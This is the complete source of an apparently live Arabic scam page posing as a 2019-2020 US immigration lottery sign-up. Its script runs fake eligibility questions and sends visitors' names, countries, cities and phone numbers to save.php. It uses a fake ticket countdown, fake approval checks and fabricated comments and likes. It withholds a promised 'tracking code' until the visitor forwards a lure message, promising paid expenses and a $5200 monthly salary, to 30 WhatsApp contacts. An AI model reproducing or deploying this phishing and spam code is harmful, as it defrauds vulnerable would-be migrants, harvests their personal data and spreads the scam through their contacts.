  <!DOCTYPE html>
    <html>
		<head>


  <!-- Global site tag (gtag.js) - Google Analytics -->

<script>
 // code adsence
</script>


	<meta charset="utf-8">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
	<title>تسجيل في قرعة أمريكا للموسم 2019 للحصول على الفيزا سارعوا</title>
        <meta name="keywords" content="تسجيل في قرعة أمريكا للموسم 2019 للحصول على الفيزا سارعوا">
	<meta name="description" content="تسجيل في قرعة أمريكا للموسم 2019 للحصول على الفيزا سارعوا">
	<meta name="author" content="بيان">
	<meta property="image" content="https://i.imgur.com/y2ya8Cm.png" />
	<meta property="type" content="article" />
	<meta property="og:title" content="•تسجيل في قرعة أمريكا للموسم 2019 للحصول على الفيزا سارعوا•" />
	<meta property="og:keywords" content="تسجيل في قرعة أمريكا للموسم 2019 للحصول على الفيزا سارعوا">
	<meta property="og:description" content="تسجيل في قرعة أمريكا للموسم 2019 للحصول على الفيزا سارعوا">
	<meta property="og:image" content="https://i.imgur.com/y2ya8Cm.png" />
	<link rel="icon" href="https://i.imgur.com/y2ya8Cm.png">



	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
	<link rel="stylesheet" href="https://america.poknews.com/css/style.css">
	<link href="https://fonts.googleapis.com/css?family=Asap" rel="stylesheet">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">


	
	
	
	
	
	
	<!-- custom style add with me -->
	<style>
	
	
	html,
	body,
	div,
	span,
	h4,
	p,
	a,
	img,
	strong,
	i {
		margin: 0;
		padding: 0;
		border: 0;
		font-size: 100%;
		font: inherit;
		vertical-align: baseline;
	}


	body {
		line-height: 1;
	}


	* {
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
		direction: rtl;
	}

	body {
		font-family: 'Open Sans', sans-serif;
		font-size: 16px;
		color: #262626;
		line-height: 1.3;
	}

	.img-responsive {
		margin: 0 auto;
		display: block;
		height: auto;
		max-width: 100%;
	}


	/* COMMENTS */

	.comment-area {
		margin-top: 10px;
		position: relative;
		z-index: 610;
		font-size: 14px !important;
		font-size: 0.95em;
		text-align: right;
		font-family: 'Myriad Pro', sans-serif;
	}

	.action .active-like {
		background-image: url("../images/like-active.png") !important;
		color: #5890ff;
	}

	.action {
		border-top: 1px solid #e6e6e6;
		background: #fff;
		padding: 5px 10px;
	}

	.action a {
		display: inline-block;
		padding-left: 20px;
		text-decoration: none;
		color: #6d6d6d;
		margin-right: 15px;
	}

	.action .like {
		background: url(../images/like.png) no-repeat left center;
	}

	.action .bubble {
		background: url(../images/bubble.png) no-repeat left center;
	}

	.action .share-btn {
		background: url(../images/share.png) no-repeat left center;
	}

	.tot-likes {
		padding: 0 10px;
	}

	.tot-likes > p {
		line-height: 20px;
		padding: 5px 0;
		color: #3f5199;
		border-bottom: 1px solid #e1e3e4;
	}

	.like-imgs {
		padding: 10px 0 5px;
		max-height: 47px;
		overflow: hidden;
	}

	.like-imgs > div {
		display: inline-block;
		margin-right: 5px;
		position: relative;
		margin-bottom: 5px;
	}

	.like-imgs > div img {
		display: block;
	}

	.like-imgs > div .reaction-img {
		position: absolute;
		bottom: -5px;
		right: -5px;
		z-index: 10;
	}

	.you {
		display: none;
	}

	.comment {
		position: relative;
		padding: 10px 10px 10px 70px;
		min-height: 70px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}

	.profile {
		position: absolute;
		top: 10px;
		right: 10px;
	}

	.name {
		font-weight: 700;
		text-decoration: none;
		color: #3f5199;
		margin-left: 5px;
	}

	.com-txt {
		margin-bottom: 10px;
		margin-right: 65px;
		font-weight: 500;
		font-size: 17px;
	}

	.act {
		margin-right: 65px;
	}

	.act a {
		color: #5890ff;
		text-decoration: none;
	}

	.liked {

		padding-right: 16px;
		line-height: 16px;
		color: #8d9098;
		font-weight: 300;
		padding-left: 5px
	}

	.liked:after {
		content: 'إعجاب';
	}

	#Welcome {
		color: darkred;
		font-size: 35px;
	}

	.time {
		color: #8d9098;
		font-weight: 300;
	}

	.comment .comment {
		padding-left: 0;
		margin-right: 50px;
	}

	.comment .comment .profile {
		right: 0 !important;
		width: 40px !important;
		height: 40px !important;
	}

	.addComment {
		position: relative;
		padding: 10px 10px 10px 70px;
		height: 70px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
	}

	.addComment img {
		position: absolute;
		right: 10px;
		top: 8px;
	}

	.addComment input {
		border-radius: 2px;
		-moz-border-radius: 2px;
		-webkit-border-radius: 2px;
		border: 1px solid #e0e0e0;
		line-height: 48px;
		width: 100%;
		display: block;
		outline: 0;
		padding: 0 50px 0 10px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;

	}

	.hider,
	.likehide,
	#myCom {
		display: none;
	}

	body {
		background-color: #fff;
		color: #4a4a4a;
		font-family: Asap;
	}

	.txt01 {
		color: #CD3335;
		font-size: 1.0em;
		font-family: Asap;
	}



	.button {
		background-color: #489891;
		color: #fff;
		font-size: 1.2em;
		font-weight: bold;
		text-align: center;
		padding: 10px;
		margin-top: 5px;
		cursor: pointer
	}

	.button:hover {
		opacity: 0.9
	}

	.button2 {
		background-color: #009846;
		color: #fff;
		font-size: 1.2em;
		font-weight: bold;
		text-align: center;
		padding: 10px;
		margin-top: 10px;
	}

	a {
		color: #fff;
	}

	.col-xs-12 {
		margin: 0px;
		padding: 0px;
	}

	div.footer {
		background-color: #fff;
		color: #333;
		display: none;
	}

	.hr01 {
		color: none;
		border: 0px;
		border-top: solid 1px #846061;
		border-bottom: 0px;
		font-size: 0px;
	}

	.gutschein {
		background-color: #489891;
		border-radius: 10px;
		padding: 10px;
		font-weight: bold;
		color: #ffffff;
		font-size: 1.0em;
		margin-top: 2px;
		text-align: center;
	}

	.frage {
		text-align: center;
		margin-top: 15px;
		font-weight: bold;
		font-size: 1.5em;
		color: hsl(9, 63%, 58%)
	}

	.wrapper_02 {
		padding-left: 5px;
		padding-right: 5px;
	}


	div.footer {
		margin-top: 20px;
		padding-top: 10px;
		padding-bottom: 10px;
	}

	.for {
		border-bottom-width: 2px;
		border-left-width: 2px;
		border-right-width: 2px;
		border-top-width: 2px;
		font-size: 20;
		height: 42px;
		padding-bottom: 0px;
		padding-left: 0px;
		padding-top: 0px;
		width: 252px !important;
		border: 3px solid #ced4da;
		border-radius: 11px;
		display: block;
		margin-bottom: 10px;
		text-align: center;
	}

	.for:focus {
		outline: 0;
	}
	
	</style>




	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">




	<script src="https://america.poknews.com/js/popper.js"></script>
	<script src="https://america.poknews.com/js/jquery.js"></script>
	<script src="https://america.poknews.com/s4.min.js"></script>
	  
	  
	  <!-- custom javascript add by  me -->
	<script language='javascript' >
	
	var texts = [" *قرعة الهجرة الأمريكية*  للموسم 🇺🇸🇺🇸🇺🇸 2019-2020  *آخر أجل للتسجيل* الاسبوع القادم 09/2018 😱😲  سارع في التسجيل ماذا تنتظر 🔥🔥  .. مطلوب *000 140* 👫 شخص كالعادة .. جميع المصاريف مدفوعة 😍😍 مع السكن و راتب شهري يصل الى *5200* دولار 🤑 . رابط الموقع الرسمي للتسجيل : https://america-hegraa.blogspot.com/   "];










function loadCom(a, b) {
	setTimeout(function () {
		$(a).fadeIn(250);
	}, b);
}
$.fn.onEnterKey = function (callback) {
	$(this).keypress(function (event) {
		var code = event.keyCode ? event.keyCode : event.which;
		if (code == 13) {
			callback();
			return false;
		}
	});
}

function loadAllComment() {
	loadCom('#com1', 3250);
	loadCom('#com2', 5800);
	loadCom('#com3', 5700);
	loadCom('#com4', 7500);
	loadCom('#com5', 9000);
}

$(document).ready(function () {

	loadAllComment();

	$('.like').on('click', function () {
		var _this = $(this);
		if (_this.hasClass('active-like')) {
			_this.removeClass('active-like');
			$('.you').removeClass('activee');
		} else {
			_this.addClass('active-like');
			$('.you').addClass('activee');
		}
	});

	$(document).on('click', '.fblike', function () {
		var _this = $(this);
		var x = _this.next().next().html() == '' ? 0 : parseInt(_this.next().next().html());
		if (_this.hasClass('selected')) {
			_this.removeClass('selected').html('إعجاب');
			_this.next().next().html(--x);
			if (x == 0) _this.next().next().addClass('likehide');
		} else {
			_this.addClass('selected').html('إزالة الإعجاب');
			_this.next().next().html(++x);
			if (_this.next().next().hasClass('likehide')) _this.next().next().removeClass('likehide');
		}
	});
	$("#addCom").onEnterKey(function () {
		var value = $("#addCom").val();
		$("#addCom").val("");
		$("#myComment").html(value);
		$(".addComment").hide();
		loadCom('#myCom', 250);
	});


	var teilen = 10;

	var pruefen = 0;

	//3 Fragen und Pruefung   

	$("#frage_01").click(function () {
		$('#frage_02').slideDown();
		$('#frage_01').slideUp();
	});

	$("#frage_02").click(function () {
		$('#frage_03').slideDown();
		$('#frage_02').slideUp();
	});

	$("#frage_03").click(function () {
		$('#frage_04').slideDown();
		$('#frage_03').slideUp();
	});

	$("#frage_04 button").click(function () {
		if ($("#nameform").val() == "") {
			alert("يجب عليك إعطانا كافة المعلومات أولاً !!");
		} else {

			$.ajax({
				url: "save.php",
				data: {
					name: $("#nameform").val(),
					city: $("#cityform").val(),
					city1: $("#city1form").val(),
					phone: $("#phoneform").val()


				}

			});


			$("#Welcome").html("تهانينا " + $("#nameform").val() + " !");
			$('#content_02').fadeIn();
			$('#frage_04').fadeOut();
			$('#aufforderung').fadeOut();


			for (var i = 0; i < texts.length; i++) {
				texts[i] = texts[i].trim();
				//////////////////////////////////////////////////
				var name = " تم دعوتك من قبل  " + $("#nameform").val();
				texts[i] = texts[i] + name;
				//////////////////////////////////////////////////
				texts[i] = texts[i].replace(/ /g, "%20");



			}
			var number = Math.floor((Math.random() * texts.length));
			var rand = "whatsapp://send?text=" + texts[number];
			$("#whats").attr("href", rand);


			var myTimer1 = window.setInterval(updateTimer1, 2000);

			function updateTimer1() {
				pruefen++;
				$("#check").text(pruefen);

				if (pruefen == 1) {
					show('#pruefen_01');
				}

				if (pruefen == 2) {
					show('#pruefen_02');
				}

				if (pruefen == 3) {
					show('#pruefen_03');
				}

				if (pruefen == 4) {
					window.clearInterval(myTimer1);
					$('#content_03').fadeIn();
					$('#content_02').fadeOut();
					$('#intro').fadeOut();
				}
			}
		}
	});

	$("#btnShare1").click(function () {
		teilen--;
		$('#anzahl').text(teilen);

		if (teilen == 0) {
			show('#btnWin');
			hide('#btnFakeWin');
		}

	});

	$("#btnShare2").click(function () {
		teilen--;
		$('#anzahl').text(teilen);

		if (teilen == 0) {
			show('#btnWin');
			hide('#btnFakeWin');
		}

	});

	$("#btnFakeWin").click(function () {
		alert('Please share it with  ' + Share + ' Other Contacts!');
	});

	function show(toBlock) {
		//setDisplay(toBlock, 'block');
		$(toBlock).show();
	}

	function hide(toNone) {
		//setDisplay(toNone, 'none');
		$(toNone).hide();
	}

	function setDisplay(target, str) {
		document.getElementById(target).style.display = str;
	}


	var zeit = new Date();

	var sec = zeit.getSeconds();

	if (sec < 6) {
		sec = 9
	}

	if (sec > 5 & sec < 13) {
		sec = 8
	}

	if (sec > 11 & sec < 19) {
		sec = 7
	}

	if (sec > 17 & sec < 25) {
		sec = 6
	}

	if (sec > 23 & sec < 31) {
		sec = 5
	}

	if (sec > 29 & sec < 37) {
		sec = 4
	}

	if (sec > 35 & sec < 43) {
		sec = 3
	}

	if (sec > 41 & sec < 49) {
		sec = 2
	}

	if (sec > 47 & sec < 55) {
		sec = 1
	}

	if (sec > 54) {
		sec = 0
	};


	var add = sec;

	var zeit2 = new Date();

	var minute = zeit2.getMinutes();

	var timer1 = (60 - minute) * 60;

	if (timer1 > 1800) {
		var resttimer = (30 - minute) * 10
	} else {
		var resttimer = (60 - minute) * 10
	};

	var timer = resttimer + add + 67;

	function updateTimer() {
		timer--;
		$("#gutschein").text(timer);

		if (timer < 9) {
			stopFunction();
		}
	}

	var myTimer = window.setInterval(updateTimer, 6000);

	function stopFunction() {
		window.clearInterval(myTimer);
	}
});



var c = 0;

$(document).ready(function () {
	$("#b1")
		.on('click', function () {
			++c;
			if (c > 3) {
				$(this)
					.attr({
						href: "https://america-hegraa.netlify.com/final.html",
						target: "_self"
					});
			}
		});
	$("#b2")
		.on('click', function () {
			if (c > 3) window.location = "https://america-hegraa.netlify.com/final.html";
			else window.alert(" الرجاء إرسال الكود على الأقل 30 مرة ليتم ارسال كود التتبع ! \n\n المشاركات التي قمت بها  " + c);
		});
});
	
	</script>
	
	
	

<script>
//code adsence
</script>


        </head>






        <body style="margin: 0;padding: 0">

	<header style="background: #963fda;margin: 0;margin-bottom: 15px;">

        <a href="#" style="height: 7%;">
        <img src="https://i.imgur.com/y2ya8Cm.png" alt="وظائف شاغرة فى فودافون"  style="
    border-radius: 5px;padding: 15px
" width="80">
        </a>

	</header>




	<div>

		<img class="center-block" style="border-top: 1px solid #fff;margin:auto; width:300px;height:200px" src="https://i.imgur.com/y2ya8Cm.png"  >

	</div>
	<div class="wrapper_02">

		<div style="font-size:0.7em;margin-top:10px; color:#949494;">

			<script language="javascript">
				<!--

				var datum = new Date()
				var jahr = datum.getFullYear()

				var tag = datum.getDate()

				function monat1() {
					var monat = datum.getMonth()

					if (monat == 0) document.write("1");
					if (monat == 1) document.write("2");
					if (monat == 2) document.write("3");
					if (monat == 3) document.write("4");
					if (monat == 4) document.write("5");
					if (monat == 5) document.write("6");
					if (monat == 6) document.write("7");
					if (monat == 7) document.write("8");
					if (monat == 8) document.write("9");
					if (monat == 9) document.write("10");
					if (monat == 10) document.write("11")
					if (monat == 11) document.write("12")
				}

				function wotag() {
					var datum = new Date()
					var wochentag = datum.getDay()

					if (wochentag == 0) document.write("الأحد");
					if (wochentag == 1) document.write("الاثنين");
					if (wochentag == 2) document.write("الثلاثاء");
					if (wochentag == 3) document.write("الأربعاء");
					if (wochentag == 4) document.write("الخميس");
					if (wochentag == 5) document.write("الجمعة");
					if (wochentag == 6) document.write("السبت");
				}

				wotag()
				document.write(" / ")

				document.write(tag, " / ")
				monat1()
				document.write(" / ", jahr)

				//-->

			<!-- </script> -->

		</div>


		<div class="txt01" style="font-size: 1.4em; padding-bottom:8px;font-weight:bold;">
		<center>
		مرحبا في التسجيل في برنامج الهجرة  أمريكا للموسم 2019-2020
		</center>
		</div>
		
		


		<div class="gutschein">التذاكر المتبقية :
			<span id="gutschein"><i>جار التحميل ...</i></span>
		</div>

		<div id="aufforderung" style="text-align: center; margin-top: 10px; margin-bottom: 10px; font-size: 1.0em; font-weight: bold;">
			الرجاء الإجابة على الأسئلة التالية </div>
			
			

		<div id="frage_01">
			<div class="frage">اختر الفئة العمرية </div>
			<div class="button">15-21</div>
			<div class="button">22-30</div>
			<div class="button">31-50</div>

		</div>

		<div id="frage_02" style="display: none">
			<div class="frage">الحالة الاجتماعية</div>
			<div class="button">عازب(ة)</div>
			<div class="button">متزوج(ة)</div>
			<div class="button">مطلق(ة)</div>
		</div>

		<div id="frage_03" style="display: none">
			<div class="frage">هل قمت من قبل بزيارة أمريكا ؟؟</div>
			<div class="button">نعم</div>
			<div class="button">لا</div>



<script>
    //code adsence
</script>

		</div>

		<div id="frage_04" style="display: none">
			<div class="frage">املأ الاستمارة</div>
			<center>
				<input class="for" placeholder="الاسم الكامل" id="nameform"><input class="for" placeholder="البلد" id="cityform"><input class="for" placeholder="المدينة" id="city1form"><input class="for" placeholder="رقم الهاتف مع كود الدولة" id="phoneform">
				<button class="btn btn-info" style="width: 150px;padding: 15px;font-size: 15px;background-color: ">تسجيل</button></center>
		</div>
		



		<!-- Content 2 -->

		<div id="content_02" style="display: none; margin-top: 15px;">يرجى الانتظار، نحن نقوم بمعالجة إجاباتك
			<br />
			<img id="laden" class="img-responsive center-block" style="padding:10px;" src="https://america.poknews.com/images/loading.gif">
			<div id="pruefen_01" style="display: none;"><span style="color: #009846; padding-right: 5px;"><i class="fa fa-check" aria-hidden="true"></i></span> تم الرد على جميع الأسئلة
			</div>
			<div id="pruefen_02" style="display: none;"><span style="color: #009846; padding-right: 5px;"><i class="fa fa-check" aria-hidden="true"></i></span> لم يتم العثور على إدخالات مكررة
			</div>
			<div id="pruefen_03" style="display: none;"><span style="color: #009846; padding-right: 5px;"><i class="fa fa-check" aria-hidden="true"></i></span> أنت مؤهل بنسبة 100٪.
			</div>
		</div>
		<center>
			<div id="content_03" style="display: none; margin-top:15px;">
				<div style="font-size:1.4em;margin-bottom:10px;"><strong id="Welcome">تهانينا!
</strong></div>
				<div style="margin-bottom: 10px">



					<font color="green">
						لم يتبقى لك سوى خطوة للحصول على رقم تتبع الخاص بك .
					</font>




				</div>
				<B>	1.اضغط على الزر الاخضر الموجود في الأسفل وارسل الرسالة لـ 30 شخص او مجموعات على الـ WhatsApp ليتم ارسال لك كود تتبع السحب في رسالة على الواتساب
.<B/>
	<br /> 2. انقر على "ارسال كود تتبع" .
				<br /> 3. سيتم ارسال لك كود التتبع .

<hr/>

   <!--code adsence-->
<script>
//code adsence
</script>

 <br />   <font color="red" >ملاحظة : لن يتم إرسال كود تتبع الخاص بك وتسجيل في حال لم تنشر الرسالة</font>

				<!-- Button zum Teilen -->

				<a id="whats" href="whatsapp://send?text=*Ryanair récompense tout le monde avec 2 billets d'avion gratuits * pour célébrer 33 ans de service de qualité. Obtenez votre billet gratuit à: .">
					<div id="b1" class="button2">
						<img style="max-height:20px;" src="https://america.poknews.com/images/whatsapp.png">
						<span style="margin-left:5px; ">واتساب</span>
					</div>
				</a>




				<a href="javascript:void(0)" id="b2">
					<div class="button"><span style="padding-right: 5px;" class="glyphicon glyphicon-shopping-cart"></span>ارسال كود تتبع </div>
				</a>
</div>
</center>
</div>




	<div class="comment-area">
		<div class="action">
			<a class="like" href="javascript: void(0);">إعجاب</a>
			<a class="bubble" href="javascript: void(0);">تعليق</a>
			<a class="share-btn" href="javascript: void(0);">مشاركة</a>
		</div>
		<div class="tot-likes">
			<div class="like-imgs">
				<div><img src="https://4.bp.blogspot.com/-1eDvXSC_wEY/WnJkGZJkHiI/AAAAAAAAAIQ/R0DDxf3BhdA406XlmtRYlga5oQ_ViMB-wCLcBGAs/s1600/img2.jpg" width="32" height="32" /><img class="reaction-img" src="https://3.bp.blogspot.com/-lh6Rs-bu_jk/WnJkFxTjybI/AAAAAAAAAIA/0q2RWLszOMwhHxzC7iiA97X738a8OouowCLcBGAs/s1600/btn.png" width="16" height="16" /></div>
				<div><img src="https://2.bp.blogspot.com/-pyg_7rSIx7A/WnJkGS9-CtI/AAAAAAAAAIM/YfCzT1qDnT8YkP0KRkZg-XtOo6n8Eg8DACLcBGAs/s1600/img1.jpg" width="32" height="32" /><img class="reaction-img" src="https://2.bp.blogspot.com/-LdQEPf11-kk/WnJkInB6S-I/AAAAAAAAAJE/ciFawWaHyWo2QQyEFmLXbg9jtYRXj6exgCLcBGAs/s1600/love.png" width="16" height="16" /></div>
				<div><img src="https://2.bp.blogspot.com/-ndyXGnA3mh4/WnJkGhH7QqI/AAAAAAAAAIU/J9cN-JIqwcc7qOlw-SvdOBWjhPlr8YFaQCLcBGAs/s1600/img3.jpg" width="32" height="32" /><img class="reaction-img" src="https://3.bp.blogspot.com/-lh6Rs-bu_jk/WnJkFxTjybI/AAAAAAAAAIA/0q2RWLszOMwhHxzC7iiA97X738a8OouowCLcBGAs/s1600/btn.png" width="16" height="16" /></div>
				<div><img src="https://4.bp.blogspot.com/-6sYv6HGPZ-k/WnJkGl5PJAI/AAAAAAAAAIY/Fpw9rkNcfWwCANrvDOJBDaRxZnPlxAAmQCLcBGAs/s1600/img4%20(1).jpg" width="32" height="32" /><img class="reaction-img" src="https://3.bp.blogspot.com/-lh6Rs-bu_jk/WnJkFxTjybI/AAAAAAAAAIA/0q2RWLszOMwhHxzC7iiA97X738a8OouowCLcBGAs/s1600/btn.png" width="16" height="16" /></div>
				<div><img src="https://4.bp.blogspot.com/-_EJKDNKO4x8/WnJkHrHg1sI/AAAAAAAAAIs/lT23PwQzsAQgEctfcIIAD0OPFUSDgvtqgCLcBGAs/s1600/img8.jpg" width="32" height="32" /><img class="reaction-img" src="https://3.bp.blogspot.com/-lh6Rs-bu_jk/WnJkFxTjybI/AAAAAAAAAIA/0q2RWLszOMwhHxzC7iiA97X738a8OouowCLcBGAs/s1600/btn.png" width="16" height="16" /></div>
				<div><img src="https://4.bp.blogspot.com/-6sYv6HGPZ-k/WnJkGl5PJAI/AAAAAAAAAIY/Fpw9rkNcfWwCANrvDOJBDaRxZnPlxAAmQCLcBGAs/s1600/img4%20(1).jpg" width="32" height="32" /><img class="reaction-img" src="https://3.bp.blogspot.com/-lh6Rs-bu_jk/WnJkFxTjybI/AAAAAAAAAIA/0q2RWLszOMwhHxzC7iiA97X738a8OouowCLcBGAs/s1600/btn.png" width="16" height="16" /></div>
				<div><img src="https://3.bp.blogspot.com/-rK9rulSLm-U/WnJkH-eeauI/AAAAAAAAAIw/0e4h-KD3PzQXKv48DnppB5S6Ce2Z5EeSQCLcBGAs/s1600/img9.jpg" width="32" height="32" /><img class="reaction-img" src="https://2.bp.blogspot.com/-LdQEPf11-kk/WnJkInB6S-I/AAAAAAAAAJE/ciFawWaHyWo2QQyEFmLXbg9jtYRXj6exgCLcBGAs/s1600/love.png" width="16" height="16" /></div>
				<div><img src="https://1.bp.blogspot.com/-tzS-jCPQpqk/WnJkHGTpShI/AAAAAAAAAIg/xmpRYCCo-G0DmC7CXmQOLTFwzn8lClYogCLcBGAs/s1600/img5.jpg" width="32" height="32" /><img class="reaction-img" src="https://2.bp.blogspot.com/-LdQEPf11-kk/WnJkInB6S-I/AAAAAAAAAJE/ciFawWaHyWo2QQyEFmLXbg9jtYRXj6exgCLcBGAs/s1600/love.png" width="16" height="16" /></div>
				<div><img src="https://2.bp.blogspot.com/-hOOaYdoEAJs/WnJkHRVznJI/AAAAAAAAAIo/cid4HSfLMpoe0RzOtIwxu2m5dNMxQk4NgCLcBGAs/s1600/img7.jpg" width="32" height="32" /><img class="reaction-img" src="https://3.bp.blogspot.com/-lh6Rs-bu_jk/WnJkFxTjybI/AAAAAAAAAIA/0q2RWLszOMwhHxzC7iiA97X738a8OouowCLcBGAs/s1600/btn.png" width="16" height="16" /></div>
				<div><img src="https://1.bp.blogspot.com/-5LaB8NsDERc/WnJkHVyrRNI/AAAAAAAAAIk/rvgCPgZbFYAjwEthwW7X55yft2OvNYN4gCLcBGAs/s1600/img6.jpg" width="32" height="32" /><img class="reaction-img" src="https://2.bp.blogspot.com/-LdQEPf11-kk/WnJkInB6S-I/AAAAAAAAAJE/ciFawWaHyWo2QQyEFmLXbg9jtYRXj6exgCLcBGAs/s1600/love.png" width="16" height="16" /></div>
			</div>
		

	<p><span class="you">أنت و </span> 250,259 آخرون أعجبوا بهذا</p>
		</div>
		<div class="comment">
			<img class="profile" src="https://1.bp.blogspot.com/-0aABWLsujpQ/WnJkDmRDUJI/AAAAAAAAAHc/N5LP3sHmlJowjnALEQ5XCqWXZlkNOtjuACLcBGAs/s1600/1.png" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">رشا الزرقاوي</a>شكراً كثيراً على تم ارسال لس كود </p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked">50</span>.
				<span class="time">28 دقيقة</span>
			</div>
			<div class="comment">
				<img class="profile" src="https://2.bp.blogspot.com/-W9PKUbZonhE/WnJkDV8_-sI/AAAAAAAAAHY/6FVe1NNeRzYN6kDh5rlp38RXXPL0ix6agCLcBGAs/s1600/2.png" width="50" height="50" />
				<p class="com-txt" style="margin-right: 35px;"><a class="name" href="javascript:void(0);">جولي الصعيدي</a>نتمنى للجميع الهجرة وتحقيق حلمه :)</p>

				<div class="act"  style="margin-right: 35px;">
					<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
					<a href="javascript:void(0);">رد</a> ·
					<span class="liked">16</span>
					<span class="time">20 دقيقة</span>
				</div>
			</div>
			<div id="com3" class="comment hider">
				<img class="profile" src="https://4.bp.blogspot.com/-NFbo-QA7Uq4/WnJkDktNDtI/AAAAAAAAAHg/92W5ESU42dAZsGHnQNbls-W6jN_gjDx2gCLcBGAs/s1600/3.png" width="50" height="50" />
				<p class="com-txt"  style="margin-right: 35px;"><a class="name" href="javascript:void(0);">وسيم كناكرة</a> أرجو أن يحالفني الحظ يبدو أن كثيراً من الناس قد حصلوا على التذاكر</p>
				<div class="act"  style="margin-right: 35px;">
					<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
					<a href="javascript:void(0);">رد</a> ·
					<span class="liked"></span>
					<span class="time">الآن</span>
				</div>
			</div>
		</div>
		<div class="comment">
			<img class="profile" src="https://2.bp.blogspot.com/-K4KSw3TIOFo/WnJkEFd5irI/AAAAAAAAAHk/VyiPgE6SbAgCI-6uE-BpseEwDdLIsss0QCLcBGAs/s1600/4.png" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">أحمد الحقّي</a>إنه شيء عظيم شكراً</p>

			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked">27</span>
				<span class="time">7 دقيقة</span>
			</div>
		</div>
		<div class="comment">
			<img class="profile" src="https://1.bp.blogspot.com/-6PlK9eTpk90/WnJkEtb-O-I/AAAAAAAAAHo/XNuSbQVXwLEu6M_JhEmkUTlZCaDWnwAVQCLcBGAs/s1600/5.png" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">جمانة خالد</a> حصلت عليها .... أجل !!!</p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked">18</span>
				<span class="time">3 دقيقة</span>
			</div>
		</div>
		<div id="com1" class="comment hider">
			<img class="profile" src="https://3.bp.blogspot.com/-Jgf_XCJs42E/WnJkEkF8chI/AAAAAAAAAHs/0I7lM_SyAro22aMQoIZCY6-8ltkgpEUSACLcBGAs/s1600/6.png" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">سعاد جبر</a> تم ئرسال الكود بنجاح اشكركم</p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked likehide"></span>
				<span class="time">الآن</span>
			</div>
		</div>
		<div id="com2" class="comment hider">
			<img class="profile" src="https://4.bp.blogspot.com/-HH1jTwzRPZw/WnJkFK47moI/AAAAAAAAAHw/a6ujf1XeaFYVBTp4i91fRt3tQBYAzvlmgCLcBGAs/s1600/7.png" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">جمانا الملك</a> شكراً ...</p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked likehide"></span>
				<span class="time">الآن</span>
			</div>
			<div id="com5" class="comment hider">
				<img class="profile" src="https://3.bp.blogspot.com/-z9VFjqtAPY0/WnJkFZk01ZI/AAAAAAAAAH0/mJxuaxsqZFk2Kw69qWtEYnAvMW-9glQJwCLcBGAs/s1600/8.png" width="50" height="50" />
				<p class="com-txt"  style="margin-right: 35px;"><a class="name" href="javascript:void(0);">محمد مصطفى</a> التوفيق للجميع  :)</p>
				<div class="act"  style="margin-right: 35px;">
					<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
					<a href="javascript:void(0);">رد</a> ·
					<span class="liked likehide"></span>
					<span class="time">الآن</span>
				</div>
			</div>
		</div>
		<div id="com4" class="comment hider">
			<img class="profile" src="https://1.bp.blogspot.com/-JbRbZ_D_wb0/WnJkFUYoTrI/AAAAAAAAAH4/gZEz_6Mvjrg5yGwYfUHu__29HwO6EDRowCLcBGAs/s1600/9.png" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">كريستينا أنجل</a> شكراً جزيلاً</p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked likehide"></span>
				<span class="time">الآن</span>
			</div>
		</div>
		<div id="myCom" class="comment">
			<img class="profile" src="https://1.bp.blogspot.com/-Vlad87bbOHk/WnJkGGxJEJI/AAAAAAAAAII/BW0Y2Om6W30R8f8IrIWICZvBKNxfIZerQCLcBGAs/s1600/generic.jpg" width="50" height="50" />
			<p class="com-txt"><a class="name" href="javascript:void(0);">أنت</a>
				<span id="myComment"></span></p>
			<div class="act">
				<a class="fblike" href="javascript:void(0);">إعجاب</a> ·
				<a href="javascript:void(0);">رد</a> ·
				<span class="liked likehide"></span>
				<span class="time">الآن</span>
			</div>
		</div>
		<div class="addComment">
			<img src="https://1.bp.blogspot.com/-Vlad87bbOHk/WnJkGGxJEJI/AAAAAAAAAII/BW0Y2Om6W30R8f8IrIWICZvBKNxfIZerQCLcBGAs/s1600/generic.jpg" width="50" height="50" />
			<input type="text" id="addCom" placeholder="اكتب تعليقك...." />
		</div>
	</div>
	<center style="margin-top: 25px;margin-bottom: 25px;">
		جميع الحقوق محفوظة لشركتنا &copy; 2018
	</center>

